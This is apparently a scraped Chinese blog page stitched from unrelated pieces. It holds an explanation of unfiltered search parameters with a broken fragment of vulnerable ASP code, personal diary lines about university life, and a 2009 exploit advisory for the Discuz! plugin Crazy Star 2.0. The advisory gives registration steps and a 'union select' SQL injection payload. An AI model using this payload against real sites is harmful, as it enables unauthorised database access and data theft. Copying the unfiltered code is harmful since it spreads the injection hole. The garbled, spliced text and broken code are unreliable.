目前,一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在,常见的搜索功能代码如下:

..................
keyword=trim(request.From("keyword")
获取客户端提交在要查询的关键字,并过滤了两边的空格

if keyword="" then 如果关键字为空,则输出下面的"查询内容不能为空!'"
response.Write "alert('查询内容不能为空!');history.back(-1);

十一放假了，回家喽，嘿嘿~

貌似不习惯在校园里人多的地方穿梭！

这几天老睡不好觉，吃不好饭，我到底怎么了？

心里有那些事情放不开吧，哎……

曾经到如今一直很单纯，很天真！

困了，睡觉去了！

晚安朋友们！

今天就正式上课了，哎！

大三-离开校园最后的一年！

不敢想象会发生什么！

我信命，我相信这一切都是自己走出来的！

为自己加油！

[+] Founded : ZhaoHuAn
[+] Contact : ZhengXing[at]shandagames[dot]com
[+] Blog : http://www.patching.net/zhaohuan/
[+] Date : August, 26th 2009 [Double Seventh Festival]

========================[Soft Info]=========================

Software: Discuz! Plugin Crazy Star(family)
Version : 2.0
Vendor : http://www.discuz.com

[-] Exploit:
[+] 1) Register a User
2) Login!
[+] and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19

好久没有在网吧通宵过了，今天我来了，哈哈！